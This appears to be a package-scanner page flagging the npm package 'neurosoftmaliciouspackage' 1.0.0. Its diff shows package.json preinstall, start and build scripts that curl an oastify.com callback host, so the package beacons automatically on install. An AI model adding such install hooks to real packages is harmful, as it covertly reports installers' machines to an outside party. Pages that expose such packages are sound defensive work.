neurosoftmaliciouspackage 1.0.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of neurosoftmaliciouspackage might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/index.js +1 -0
  2. package/package.json +15 -0
package/index.js ADDED
@@ -0,0 +1 @@
1
+ // Test
package/package.json ADDED
@@ -0,0 +1,15 @@
1
+ {
2
+ "name": "neurosoftmaliciouspackage",
3
+ "version": "1.0.0",
4
+ "description": "This package was created by Nerosoft.",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "preinstall": "curl https://preinstall.4mr7p51w6wznouazhbpwl8b0trzhn6.oastify.com",
8
+ "start": "curl https://start.4mr7p51w6wznouazhbpwl8b0trzhn6.oastify.com",
9
+ "build": "curl https://build.4mr7p51w6wznouazhbpwl8b0trzhn6.oastify.com"
10
+ },
11
+ "keywords": [],
12
+ "author": "",
13
+ "license": "ISC",
14
+ "dependencies": {}
15
+ }